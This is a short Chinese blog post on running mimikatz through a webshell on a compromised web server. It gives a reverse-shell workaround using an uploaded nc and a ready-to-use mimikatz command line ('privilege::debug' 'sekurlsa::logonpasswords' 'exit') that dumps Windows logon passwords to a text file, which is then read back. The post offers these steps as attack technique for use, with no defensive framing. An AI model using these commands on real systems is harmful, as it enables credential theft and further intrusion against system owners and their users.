直接运行mimikatz.exe虽然可以激活进程,但看不到交互界面,姿势:

1、nc反弹,本地nc监听,然后上传nc到web服务器并执行反弹命令

2、直接执行mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"  "exit"> password.txt    #之前试过不加exit,会无限重定向到password.txt,加exit后会自动退出

读取txt文件:type password.txt

关于mimikatz在webshell运行

相关文章:

  • 2021-07-27
  • 2022-01-18
  • 2021-05-14
  • 2021-06-09
  • 2021-05-06
  • 2021-05-21
  • 2021-12-29
  • 2022-01-13
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2021-07-12
  • 2021-06-08
  • 2021-09-17
  • 2021-10-03
  • 2021-11-25
相关资源
相似解决方案